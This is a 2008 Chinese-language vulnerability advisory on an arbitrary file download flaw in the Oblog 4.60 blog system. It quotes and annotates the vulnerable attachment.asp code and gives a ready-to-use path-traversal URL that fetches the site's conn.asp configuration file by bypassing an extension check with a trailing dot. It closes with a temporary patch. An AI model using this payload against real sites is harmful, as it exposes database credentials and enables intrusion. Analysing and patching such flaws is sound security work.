本来这个礼物只是给BK瞬间群的朋友们共享了，特意说不让拿去搞官方，不幸的是还是有人首先拿官方测试，让人很郁闷，T了该人，拉黑。今天放出来给大家。
########################################################################
Tr4c3[at]126[dot]com 写于[2008-4-29]
版权所有:
http://www.nspcn.org/
http://www.tr4c3.com/
Bk瞬间 [QQ群] & Hi [QQ群]
########################################################################
程序下载：http://down.oblog.cn/oblog4/oblog46_Final_20080403.rar
########################################################################
描述：

愚人节那天雕牌在blog上公布了一个Oblog任意文件下载漏洞。文章见http://www.tr4c3.com/post/302.html <0day>愚人节的礼物 oblog文件下载漏洞。
随后官方发布的Oblog版本里对代码做了些许改动，并发布了相关补丁。详见：http://bbs.oblog.cn/dispbbs.asp?boardid=119&Id=132375 [oblog46体验版_patch_20080403补丁]
http://www.target.com/attachment.asp?path=./conn.asp这样已经无法下载文件，我从官方下载了最新版本4.60 Final Build080403 Access(集成了attachment.asp补丁)，发现修改后的代码并不能解决问题,OBlog任意文件下载漏洞依然存在。具体看attachment.asp代码。
########################################################################
关键部分：

Path = Trim(Request("path")) '获取用户提交的路径
FileID = Trim(Request("FileID"))
If FileID ="" And Path = "" Then
         Response.Write "参数不足"
         Response.End
End If
...
If CheckDownLoad   Or 1= 1Then
         If Path = "" Then
                 set rs = Server.CreateObject("ADODB.RecordSet")
                 link_database
                 SQL = ("select file_path,userid,file_ext,ViewNum FROM oblog_upfile WHERE FileID = "&CLng(FileID))
                 rs.open sql,conn,1,3
                 If Not rs.Eof Then
                         uid = rs(1)
                         file_ext = rs(2)
                         rs("ViewNum") = rs("ViewNum") + 1
                         rs.Update
                         downloadFile Server.MapPath(rs(0)),0
                 Else
                         Response.Status=404
                         Response.Write "该附件不存在!"
                 End If
                 rs.Close
                 Set rs = Nothing
         Else
                 If InStr(path,Oblog.CacheConfig(56)) > 0 Then 'Tr4c3标注：注意这里，仅仅判断用户提交的路径是否包含UploadFiles，为真则调用downloadfile函数下载文件
                         downloadFile Server.MapPath(Path),1
                 End if
         End If
Else
         '如果附件为图片的话，当权限检验无法通过则调用一默认图片，防止<img>标记无法调用，影响显示效果
         If Path = "" Then
                 Response.Status=403
                 Response.Write ShowDownErr
                 Response.End
         Else
                 downloadFile Server.MapPath(blogdir&"images/oblog_powered.gif"),1
         End if
End if

Set oblog = Nothing

Sub downloadFile(strFile,stype)
         On Error Resume Next
         Server.ScriptTimeOut=9999999
         Dim S,fso,f,intFilelength,strFilename
         strFilename = strFile
         Response.Clear
         Set s = Server.CreateObject(oblog.CacheCompont(2))
         s.Open
         s.Type = 1
         Set fso = Server.CreateObject(oblog.CacheCompont(1))
         If Not fso.FileExists(strFilename) Then
                 If stype = 0 Then
                         Response.Status=404
                         Response.Write "该附件已经被删除!"
                         Exit Sub
                 Else
                         strFilename = Server.MapPath(blogdir&"images/nopic.gif")
                 End if
         End If
         Set f = fso.GetFile(strFilename)
         intFilelength = f.size
         s.LoadFromFile(strFilename)
         If Err Then
                  Response.Write("<h1>错误: </h1>" & Err.Description & "<p>")
                 Response.End
         End If
         Set fso=Nothing
         Dim Data
         Data=s.Read
         s.Close
         Set s=Nothing
         Dim ContentType
         select Case LCase(Right(strFile, 4))
         Case ".asp",".mdb",".config",".js" 'Tr4c3标注：再看这里，想起来什么来了？对了，前几天我发的沸腾展望新闻系统的任意下载漏洞跟这个检查的方法差不多[http://www.tr4c3.com/post/306.html]，利用方法也相似，神奇的"."又派上用场了。
                 Exit Sub
         Case ".asf"
                 ContentType = "video/x-ms-asf"
         Case ".avi"
                 ContentType = "video/avi"
         Case ".doc"
                 ContentType = "application/msword"
         Case ".zip"
                 ContentType = "application/zip"
         Case ".xls"
                 ContentType = "application/vnd.ms-excel"
         Case ".gif"
                 ContentType = "image/gif"
         Case ".jpg", "jpeg"
                 ContentType = "image/jpeg"
         Case ".wav"
                 ContentType = "audio/wav"
         Case ".mp3"
                 ContentType = "audio/mpeg3"
         Case ".mpg", "mpeg"
                 ContentType = "video/mpeg"
         Case ".rtf"
                 ContentType = "application/rtf"
         Case ".htm", "html"
                 ContentType = "text/html"
         Case ".txt"
                 ContentType = "text/plain"
         Case Else
                 ContentType = "application/octet-stream"
         End select
         If Response.IsClientConnected Then
                 If Not (InStr(LCase(f.name),".gif")>0 Or InStr(LCase(f.name),".jpg")>0 Or InStr(LCase(f.name),".jpeg")>0 Or InStr(LCase(f.name),".bmp")>0 Or InStr(LCase(f.name),".png")>0 )Then
                         Response.AddHeader "Content-Disposition", "attachment; filename=" & f.name
                 End If
                 Response.AddHeader "Content-Length", intFilelength
                 Response.CharSet = "UTF-8"
                 Response.ContentType = ContentType
                 Response.BinaryWrite Data
                 Response.Flush
                 Response.Clear()
         End If
End Sub

########################################################################
利用方法：
http://www.target.com/attachment.asp?path=UploadFiles/../conn.asp.
########################################################################
修补建议：
等待官方发布新的补丁程序。
########################################################################
临时解决办法：
将attachment.asp第5行 Path = Trim(Request("path")) 改成 Path = Replace(Trim(Request("path")),"..","")
########################################################################